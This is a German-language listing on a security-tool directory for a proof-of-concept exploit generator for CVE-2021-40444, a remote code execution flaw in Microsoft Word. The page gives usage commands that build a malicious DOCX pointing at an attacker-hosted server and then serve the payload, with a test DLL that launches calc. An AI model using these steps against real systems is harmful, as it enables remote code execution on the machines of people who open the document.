Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx — Erzeugt bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office Word RCE) ausnutzen, mit einem integrierten HTTP-Server zum Hosting der Payload. | Kitploit
Tools/GitHubGitHub/w1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationMalware-AnalyseCommand and Control
GitHubw1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx

Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx

Erzeugt bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office Word RCE) ausnutzen, mit einem integrierten HTTP-Server zum Hosting der Payload.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

CVE-2021-40444 PoC

Böswilliger Docx-Generator zur Ausnutzung von CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Die Erstellung dieses Skripts basiert auf Reverse Engineering der im Feld verwendeten Probe: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx-Datei)

Sie müssen zuerst lcab installieren (sudo apt-get install lcab)

Siehe REPRODUCE.md für manuelle Reproduktionsschritte

Wenn Ihre generierte CAB-Datei nicht funktioniert, versuchen Sie, die URL von exploit.html auf calc.cab zu setzen

Verwendung

Generieren Sie zunächst ein böswilliges docx-Dokument aus einer DLL. Sie können die Datei unter test/calc.dll verwenden, die einfach einen calc.exe-Aufruf über system() startet.

python3 exploit.py generate test/calc.dll http://<SRV IP>

Dokumentgenerierung

Sobald Sie das böswillige docx generiert haben (wird unter out/ abgelegt), können Sie den Server einrichten:

sudo python3 exploit.py host 80

Server

Testen Sie das docx schließlich in einer virtuellen Windows-Maschine:

Rechner öffnen

Tool herunterladen